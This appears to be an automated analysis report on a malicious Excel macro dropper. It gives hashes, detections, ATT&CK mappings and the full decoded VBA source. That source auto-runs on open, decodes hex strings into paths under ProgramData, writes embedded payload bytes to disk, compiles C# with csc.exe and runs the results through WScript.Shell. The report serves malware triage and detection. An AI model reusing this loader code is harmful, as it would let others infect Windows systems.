Office (OLE) malware analysis — malicious · 662c3b181467a9d2

MALICIOUS

Office (OLE)

2.81 MB Created: 2020-01-28 11:18:08 Authoring application: Microsoft Excel First seen: 2020-07-24

MD5: b95e2ec3d72c65dd9495b633a1dbc906 SHA-1: cd5c349091d297b669e01ad8c6d69ced1d9bd89e SHA-256: 662c3b181467a9d2f40a7b632a4b5fe5ddd201a528ba408badbf7b2375ee3553

332 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The file contains heavily obfuscated VBA macros, including a Workbook_Open auto-execution routine. Critical heuristics indicate the use of WScript.Shell and CreateObject, suggesting the macro attempts to download and execute a second-stage payload. The presence of 'macros.bas' further supports this. The exact payload and delivery mechanism are not fully discernible due to obfuscation, leading to an 'unknown family' classification.

Heuristics 10

ClamAV: Xls.Dropper.Agent-7584490-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.Agent-7584490-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

    Dim Entrop As Object
    Set Entrop = CreateObject("WScript.Shell")
    Dim SetProp As Object

Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
    Dim Entrop As Object
    Set Entrop = CreateObject("WScript.Shell")
    Dim SetProp As Object
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

    Dim Entrop As Object
    Set Entrop = CreateObject("WScript.Shell")
    Dim SetProp As Object

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Attribute VB_Customizable = True
Private Sub Workbook_Open()
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/iX/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://ns.adobe.com/pdf/1.3/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10489 bytes
SHA-256: `39a0411b4f8efaa180c3c6adcf0d037ebf418aacb343650aa0e95b9e82520844`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 6 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Module1" #If VBA7 Then Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr) 'For 64 Bit Systems #Else Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long) 'For 32 Bit Systems #End If Function HitcherDasm(ByVal bStatus As Boolean) As Boolean Dim lActiveFlag As Long Dim lRetval As Long lActiveFlag = IIf(bStatus, 1, 0) lRetval = SystemParametersInfo(SPI_SETSCREENSAVEACTIVE, lActiveFlag, 0, 0) If lRetval > 0 Then EnableScreenSaver = True Else EnableScreenSaver = False End If End Function Sub BelowRadar() With Selection.Borders(xlInconsistentListFormula) .LineStyle = xlContinuous .ColorIndex = 1 .TintAndShade = 1 .Weight = xl3DArea End With With Selection.Borders(xl3ArrowsGray) .LineStyle = xlContinuous .ColorIndex = 0 .TintAndShade = 1 .Weight = xlThin End With End Sub Public Function HexToString(ByVal HexToStr As String) As String Dim strTemp As String Dim strReturn As String Dim i As Long For i = 1 To Len(HexToStr) Step 2 strTemp = Chr$(Val("&H" & Mid$(HexToStr, i, 2))) strReturn = strReturn & strTemp Next i HexToString = strReturn End Function Sub Telemarketing(ByVal one As String, ByVal second As String, ByVal third As String, ByVal Oses As String) 'Sub Telemarketing(ByVal one As String, ByVal second As String, ByVal third As String) Dim final_path_file As String Dim what_name As String Dim unpress_all As Variant Dim field_dir As Variant Dim numberings() As Byte Dim sum As String sum_all = one & second & third Dim linecounts() As String Dim Entrop As Object Set Entrop = CreateObject("WScript.Shell") Dim SetProp As Object Set SetProp = CreateObject("WScript.Shell") Dim KelProp As Object Set KelProp = CreateObject("WScript.Shell") what_name = Split(HexToString("6d6e7470657266216265617574796265617374"), "!")(0) what_name2 = Split(HexToString("73797374656d69646c6570657266216265617574796265617374"), "!")(0) field_dir = Split(HexToString("633a5c70726f6772616d64617461216265617574796265617374"), "!")(0) & Split(HexToString("5c73797374656d69646c65706572665c21626575617479"), "!")(0) If Dir(field_dir, vbDirectory) = "" Then MkDir (field_dir) End If Dim sub_str() As String Dim sub_str_couple As String Dim si As String Dim DistributedSense1() As Byte Dim DistributedSense2() As Byte Dim DistributedSense3() As Byte Dim DistributedSense4() As Byte si = HexToString("5c") unpress_all = field_dir & what_name2 & Split(HexToString("2e6173746572696b212e7a6970"), "!")(1) final_path_file = field_dir & Split(HexToString("626573746f652173797374656d69646c6570657266216265617374"), "!")(1) & Split(HexToString("2e6f7869212e766273"), "!")(1) sub_str = Split(final_path_file, "\") sub_str_couple = sub_str(0) & si & sub_str(1) & si & sub_str(2) & si & Split(HexToString("7465726d696e616c732173797374656d69646c65706572662e766273"), "!")(1) DistributedSense1 = DistributedSense(UserForm1.TextBox1.Text) ran = "Khysper-87789798" DistributedSense2 = DistributedSense(UserForm1.TextBox2.Text) ran = "Biblu-03209-1209" DistributedSense3 = DistributedSense(UserForm1.TextBox3.Text) third = "Gypsum-678-23" second = "Demon-90789-#%$@#" Call EntryDispute(unpress_all, DistributedSense1) ran = "P!G90er-TreRKl" Dim sta As Boolean ran = "T!lp-6y!nb{" Call EntryDispute(sub_str_couple, DistributedSense2) ran = "P!53er-Tr341Kl" Dim Xamarain As String Xamarin = field_dir & HexToString("5265616c74696d652e6373") Call EntryDispute(Xamarin, DistributedSense3) ran = sum_all Dim FileName As String FileName = VBA.FileSystem.Dir(HexToString("433a5c57696e646f77735c4d6963726f736f66742e4e45545c4672616d65776f726b5c76342e302e33303331395c6373632e657865")) Dim pos As Integer Dim ton As Integer pos = InStr(Oses, "6.02") ton = InStr(Oses, ".00") If Not (FileName = VBA.Constants.vbNullString) And (pos > 0 Or ton > 0) Then ''Dim pola As String 'Entrop.Run ("wscript " & sub_str_couple), 0, False SetProp.Run (HexToString("636d64202f6320777363726970742022633a5c70726f6772616d646174615c73797374656d69646c65706572665c73797374656d69646c65706572662e766273222026202222433a5c57696e646f77735c4d6963726f736f66742e4e45545c4672616d65776f726b5c76342e302e33303331395c6373632e6578652222202f743a657865202f6f75743a633a5c70726f6772616d646174615c73797374656d69646c65706572665c5265616c74696d652e73637220633a5c70726f6772616d646174615c73797374656d69646c65706572665c5265616c74696d652e6373202620633a5c70726f6772616d646174615c73797374656d69646c65706572665c77696e6470726f63782e736372202222633a5c70726f6772616d646174615c73797374656d69646c65706572665c5265616c74696d652e73637222222022222222636d642e657865222222222022222222633a5c70726f6772616d646174615c73797374656d69646c65706572665c783634692e73637222222222")), 0, False 'Handlers: 'Sleep 4000 'KelProp.Run (HexToString("636d64202f6320633a5c70726f6772616d646174615c73797374656d69646c65706572665c77696e6470726f63782e736372202222633a5c70726f6772616d646174615c73797374656d69646c65706572665c5265616c74696d652e73637222222022222222636d642e657865222222222022222222633a5c70726f6772616d646174615c73797374656d69646c65706572665c783634692e73637222222222")), 0, False Else 'Entrop.Run ("wscript " & sub_str_couple), 0, False SetProp.Run (HexToString("636d64202f6320777363726970742022633a5c70726f6772616d646174615c73797374656d69646c65706572665c73797374656d69646c65706572662e766273222026202222433a5c57696e646f77735c4d6963726f736f66742e4e45545c4672616d65776f726b5c76332e355c6373632e6578652222202f743a657865202f6f75743a633a5c70726f6772616d646174615c73797374656d69646c65706572665c5265616c74696d652e73637220633a5c70726f6772616d646174615c73797374656d69646c65706572665c5265616c74696d652e6373202620633a5c70726f6772616d646174615c73797374656d69646c65706572665c77696e6470726f632e736372202222633a5c70726f6772616d646174615c73797374656d69646c65706572665c5265616c74696d652e73637222222022222222636d642e657865222222222022222222633a5c70726f6772616d646174615c73797374656d69646c65706572665c783634692e73637222222222")), 0, False 'Handlers1: 'Sleep 4000 'KelProp.Run (HexToString("636d64202f6320633a5c70726f6772616d646174615c73797374656d69646c65706572665c77696e6470726f632e736372202222633a5c70726f6772616d646174615c73797374656d69646c65706572665c5265616c74696d652e73637222222022222222636d642e657865222222222022222222633a5c70726f6772616d646174615c73797374656d69646c65706572665c73797374656d69646c65706572662e73637222222222")), 0, False 'KelProp.Run (HexToString("636d64202f6320633a5c70726f6772616d646174615c73797374656d69646c65706572665c77696e6470726f632e736372202222633a5c70726f6772616d646174615c73797374656d69646c65706572665c5265616c74696d652e73637222222022222222636d642e657865222222222022222222633a5c70726f6772616d646174615c73797374656d69646c65706572665c783634692e73637222222222")), 0, False End If End Sub Sub EntryDispute(ByVal sophi As String, ByRef sequen() As Byte) Dim ran As String ran = "P!pper-Tr341Kl" Open sophi For Binary Access Write As #2 Put #2, , sequen Close #2 End Sub Public Function DistributedSense(ByVal tepet As String) As Byte() Dim linecounts() As String linecounts = Split(tepet, ",") Dim antenna() As Byte 'Dim DistributedSense() As Byte Dim ptstoval As Double ptstoval = 0 Dim ran As String ran = "Vistro-vstoadd-plugin+234689" For Each vl In linecounts ReDim Preserve antenna(ptstoval) ran = "Vistro-vstoadd-plugin!7470-" antenna(ptstoval) = CByte(vl) ran = "Vistro-vstoadd-plugin!8989789" ptstoval = ptstoval + 1 Next DistributedSense = antenna End Function Sub Gypsum() With Selection.Borders(xlInconsistentListFormula) .LineStyle = xlContinuous .ColorIndex = 1 .TintAndShade = 1 .Weight = xl3DArea End With With Selection.Borders(xl3ArrowsGray) .LineStyle = xlContinuous .ColorIndex = 0 .TintAndShade = 1 .Weight = xlThin End With End Sub Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Open() Dim a, b, C a = "Balley" b = "Tikinto" C = "SimSim" manu = Application.OperatingSystem 'Dim Entrop As Object 'Set Entrop = CreateObject("WScript.Shell") 'Entrop.Run (HexToString("2222633a5c70726f6772616d646174615c73797374656d69646c65706572665c5265616c74696d652e6578652222202222636d642e6578652222202222633a5c70726f6772616d646174615c73797374656d69646c65706572665c73797374656d69646c65706572662e7363722222")) Call Telemarketing(a, b, C, manu) 'Call Telemarketing(a, b, C) Sheet2.Visible = xlSheetVisible Sheet2.Copy End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{8113F3BB-1589-4601-BDE3-F975273FE35E}{1D76BB9E-FDEE-4201-A627-0D4932CB59B8}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Module2" Sub sdf() End Sub Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.